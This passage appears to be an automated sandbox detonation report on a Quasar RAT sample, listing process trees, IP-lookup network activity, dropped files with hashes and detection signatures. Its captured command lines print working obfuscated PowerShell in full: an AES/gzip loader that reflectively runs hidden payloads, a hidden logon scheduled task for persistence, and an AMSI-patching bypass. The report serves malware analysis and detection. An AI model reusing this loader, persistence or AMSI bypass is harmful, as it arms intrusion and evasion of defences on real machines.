'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_84_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_84.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_84.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_84.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, $param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Roaming\Windows_Log_84.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rzzoeQKyhAKC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$snhOBNbqMbrjTn,[Parameter(Position=1)][Type]$hcFGkaScVu)$WNiemwahZci=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+'c'+'t'+'e'+'d'+''+[Char](68)+'ele'+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'M'+'e'+''+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+'te'+[Char](84)+''+'y'+'p'+'e'+'',''+'C'+'l'+[Char](97)+''+[Char](115)+'s'+[Char](44)+'P'+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+'n'+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+','+''+'A'+'ut'+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WNiemwahZci.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+'a'+'l'+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$snhOBNbqMbrjTn).SetImplementationFlags(''+[Char](82)+'un'+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$WNiemwahZci.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'ub'+'l'+''+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+',N'+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+','+'V'+''+'i'+''+[Char](114)+'t'+'u'+'a'+[Char](108)+'',$hcFGkaScVu,$snhOBNbqMbrjTn).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+'e'+''+','+'Ma'+'n'+'aged');Write-Output $WNiemwahZci.CreateType();}$ebdedbTUhITbm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'em'+'.'+''+'d'+'ll')}).GetType(''+'M'+''+'i'+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+'Wi'+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+'n'+'s'+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+'e'+'th'+[Char](111)+''+[Char](100)+''+'s'+'');$VXwquTnXnPjGZL=$ebdedbTUhITbm.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'dr'+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+'c'+''+','+'S'+'t'+''+'a'+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$VDyOxnwUhwrVWlqJMOW=rzzoeQKyhAKC @([String])([IntPtr]);$zxlQCNATXVvABERMdrSmmZ=rzzoeQKyhAKC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AKelfWNAWgg=$ebdedbTUhITbm.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+'a'+'n'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+'e'+''+[Char](108)+''+'3'+''+[Char](50)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')));$jYcXFfQufXLrIb=$VXwquTnXnPjGZL.Invoke($Null,@([Object]$AKelfWNAWgg,[Object]('L'+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+'i'+''+'b'+'raryA')));$qaXvbwFcNhBkCygAl=$VXwquTnXnPjGZL.Invoke($Null,@([Object]$AKelfWNAWgg,[Object]('V'+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+'l'+'P'+''+[Char](114)+'o'+'t'+'e'+'c'+''+[Char](116)+'')));$XUSAHTC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jYcXFfQufXLrIb,$VDyOxnwUhwrVWlqJMOW).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+'l'+'l'+'');$hVIjLxsHXidRDMGIl=$VXwquTnXnPjGZL.Invoke($Null,@([Object]$XUSAHTC,[Object]('Am'+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$trkvCXDLfS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qaXvbwFcNhBkCygAl,$zxlQCNATXVvABERMdrSmmZ).Invoke($hVIjLxsHXidRDMGIl,[uint32]8,4,[ref]$trkvCXDLfS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hVIjLxsHXidRDMGIl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qaXvbwFcNhBkCygAl,$zxlQCNATXVvABERMdrSmmZ).Invoke($hVIjLxsHXidRDMGIl,[uint32]8,0x20,[ref]$trkvCXDLfS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+'W'+[Char](65)+''+'R'+'E').GetValue(''+[Char](36)+''+[Char](115)+''+[Char](120)+''+[Char](114)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{926ed3a3-1b2e-462b-8b43-2df6e608e5c8}
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe e6d3e296fb89abf3bcb0887ede4bb112 IHWnMT+wD02CCpkizVKQjg.0.1.0.0.0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | freegeoip.net | udp |
Files
memory/1852-0-0x000000007540E000-0x000000007540F000-memory.dmp
memory/1852-1-0x00000000047E0000-0x0000000004816000-memory.dmp
memory/1852-3-0x0000000004E50000-0x0000000005478000-memory.dmp
memory/1852-2-0x0000000075400000-0x0000000075BB0000-memory.dmp
memory/1852-4-0x0000000004DD0000-0x0000000004DF2000-memory.dmp
memory/1852-5-0x00000000056B0000-0x0000000005716000-memory.dmp
memory/1852-6-0x0000000005720000-0x0000000005786000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e3exzvch.iax.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1852-16-0x00000000057D0000-0x0000000005B24000-memory.dmp
memory/1852-17-0x0000000005C80000-0x0000000005C9E000-memory.dmp
memory/1852-18-0x0000000005CD0000-0x0000000005D1C000-memory.dmp
memory/1852-19-0x0000000006E00000-0x0000000006E44000-memory.dmp
memory/1852-20-0x0000000006F70000-0x0000000006FE6000-memory.dmp
memory/1852-21-0x0000000007670000-0x0000000007CEA000-memory.dmp
memory/1852-22-0x0000000007010000-0x000000000702A000-memory.dmp
memory/1852-23-0x0000000000A10000-0x0000000000A18000-memory.dmp
memory/1852-24-0x0000000007240000-0x00000000072AE000-memory.dmp
memory/1852-25-0x000000000A2A0000-0x000000000A844000-memory.dmp
memory/2332-27-0x0000000075400000-0x0000000075BB0000-memory.dmp
memory/2332-28-0x0000000075400000-0x0000000075BB0000-memory.dmp
memory/2332-29-0x0000000075400000-0x0000000075BB0000-memory.dmp
memory/2332-39-0x0000000006470000-0x00000000064A2000-memory.dmp
memory/2332-40-0x00000000711A0000-0x00000000711EC000-memory.dmp
memory/2332-51-0x0000000075400000-0x0000000075BB0000-memory.dmp
memory/2332-50-0x0000000006450000-0x000000000646E000-memory.dmp
memory/2332-53-0x0000000075400000-0x0000000075BB0000-memory.dmp
memory/2332-52-0x0000000007080000-0x0000000007123000-memory.dmp
memory/2332-54-0x0000000007240000-0x000000000724A000-memory.dmp
memory/2332-55-0x0000000007450000-0x00000000074E6000-memory.dmp
memory/2332-56-0x00000000073D0000-0x00000000073E1000-memory.dmp
memory/2332-57-0x0000000075400000-0x0000000075BB0000-memory.dmp
memory/2332-60-0x0000000075400000-0x0000000075BB0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4d1f832f887a29cd6ee3d901727835c1 |
| SHA1 | 4f64e9327c3d5571dc4c401aec62e52894e92e52 |
| SHA256 | 0ad91bcd486841d65727f7f4f1c8983c6c030aa7a74badf799141d9c0266a183 |
| SHA512 | a4f6ed11c8c4845ad4032c3aa323e015e63872f506c65e9677c5223b8a03317c0776dacd54c24117ee365a028ee8baeffe66fd03193bbc39af5c5e2af9cfe07f |
C:\Users\Admin\AppData\Roaming\Windows_Log_84.vbs
| MD5 | 750528b35ca8a97cadf1a08441f7b523 |
| SHA1 | e99f6de402feb70884868593d097ea76cfd6319f |
| SHA256 | 0af72095efe07657271a5c3668ef0aa578d8cc536ec8c3a1f3542512dd33ad42 |
| SHA512 | e3a9501beeb49bfbfc7457f0d7f9fe469da0b484ce02cb8ccbe670795e9d637c4e2cfce7f8fc4a4692377c88e6dc2d62b6e0e9ca26a8f82ae11499bbe90268c4 |
C:\Users\Admin\AppData\Roaming\Windows_Log_84.bat
| MD5 | d4c582bb5890af020c110f2b1de1d9db |
| SHA1 | 04c25b115c7bdaced94746c4acf9b5245f064ea0 |
| SHA256 | d34225f65c10acac82f381cf0f4281b2bc691afb2b72a1331acee94ca10e5c1c |
| SHA512 | 4b104fd0f62ecab38cc02b4cd77e6b8b5bcaaa3d98ad48f537fc7a67aa7d72d4575026921b63c9a743a41faaf3dd3154717bd6690f87dcb4114da05106b93012 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | cd2c75d15d8eb9167d113a4a2b932a6b |
| SHA1 | 7de577bf0594c4ffe8c1d52548c41f2c627922e4 |
| SHA256 | d1600d97356b905bd8140cf30ed23b10717107b30d82963c36ef2135a94e0938 |
| SHA512 | abd4bfe9aea63dd8c1198fb645fca3de30b8bbcd691914a1eeccec54690338d66e9aad371454cd5f0cfae79b5bb3b2b79a24db5519e5e41a959d57b96f99dd14 |
memory/1852-78-0x0000000075400000-0x0000000075BB0000-memory.dmp
memory/1952-81-0x0000000007560000-0x00000000075BE000-memory.dmp
memory/1952-82-0x0000000009DF0000-0x0000000009E82000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Install.exe
| MD5 | b489b7d9efc807fb9583f21f39327fc2 |
| SHA1 | 1ee42e6c08cd0a51d5c763c6b8771c004b962865 |
| SHA256 | 6f1bc33cba78e569e98566aa17be4a548c9ed1a6ea0f35a2149ad504def56579 |
| SHA512 | 53be2dc3574e1da8c643b24e6b982a19f6f2f4748acc38d5c625f66e701c1b4124156983c29668c8bed4c79b5f27d0f932c8a38ebecb33170c283f1161068c2e |
memory/1952-90-0x0000000007370000-0x0000000007382000-memory.dmp
memory/3188-91-0x0000026A22DA0000-0x0000026A22DC2000-memory.dmp
memory/3188-101-0x0000026A23110000-0x0000026A2313A000-memory.dmp
memory/3188-103-0x00007FF8EB220000-0x00007FF8EB2DE000-memory.dmp
memory/3188-102-0x00007FF8ECC30000-0x00007FF8ECE25000-memory.dmp
memory/4924-107-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4924-106-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4924-105-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4924-104-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4924-111-0x0000000140000000-0x0000000140008000-memory.dmp
memory/4924-112-0x00007FF8ECC30000-0x00007FF8ECE25000-memory.dmp
memory/4924-113-0x00007FF8EB220000-0x00007FF8EB2DE000-memory.dmp
memory/668-135-0x00007FF8ACCB0000-0x00007FF8ACCC0000-memory.dmp
memory/668-134-0x000001F72FE00000-0x000001F72FE2A000-memory.dmp
memory/612-125-0x00007FF8ACCB0000-0x00007FF8ACCC0000-memory.dmp
memory/388-165-0x00007FF8ACCB0000-0x00007FF8ACCC0000-memory.dmp
memory/388-164-0x00000220C9710000-0x00000220C973A000-memory.dmp
memory/388-159-0x00000220C9710000-0x00000220C973A000-memory.dmp
memory/336-155-0x00007FF8ACCB0000-0x00007FF8ACCC0000-memory.dmp
memory/336-154-0x000001ED85D10000-0x000001ED85D3A000-memory.dmp
memory/336-149-0x000001ED85D10000-0x000001ED85D3A000-memory.dmp
memory/956-145-0x00007FF8ACCB0000-0x00007FF8ACCC0000-memory.dmp
memory/956-144-0x0000023A753A0000-0x0000023A753CA000-memory.dmp
memory/956-139-0x0000023A753A0000-0x0000023A753CA000-memory.dmp
memory/612-124-0x00000245EC210000-0x00000245EC23A000-memory.dmp
memory/668-129-0x000001F72FE00000-0x000001F72FE2A000-memory.dmp
memory/612-119-0x00000245EC210000-0x00000245EC23A000-memory.dmp
memory/612-118-0x00000245EC210000-0x00000245EC23A000-memory.dmp
memory/612-117-0x00000245EC1E0000-0x00000245EC205000-memory.dmp
memory/4924-114-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1952-747-0x000000000A0E0000-0x000000000A0EA000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 0b990e24f1e839462c0ac35fef1d119e |
| SHA1 | 9e17905f8f68f9ce0a2024d57b537aa8b39c6708 |
| SHA256 | a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a |
| SHA512 | c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | ceb7caa4e9c4b8d760dbf7e9e5ca44c5 |
| SHA1 | a3879621f9493414d497ea6d70fbf17e283d5c08 |
| SHA256 | 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9 |
| SHA512 | 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | 7d612892b20e70250dbd00d0cdd4f09b |
| SHA1 | 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5 |
| SHA256 | 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02 |
| SHA512 | f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | 8abf2d6067c6f3191a015f84aa9b6efe |
| SHA1 | 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7 |
| SHA256 | ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea |
| SHA512 | c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | f313c5b4f95605026428425586317353 |
| SHA1 | 06be66fa06e1cffc54459c38d3d258f46669d01a |
| SHA256 | 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b |
| SHA512 | b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-11 17:41
Reported
2024-06-11 17:46
Platform
win11-20240508-en
Max time kernel
300s
Max time network
271s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3304 created 636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3304 set thread context of 4004 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
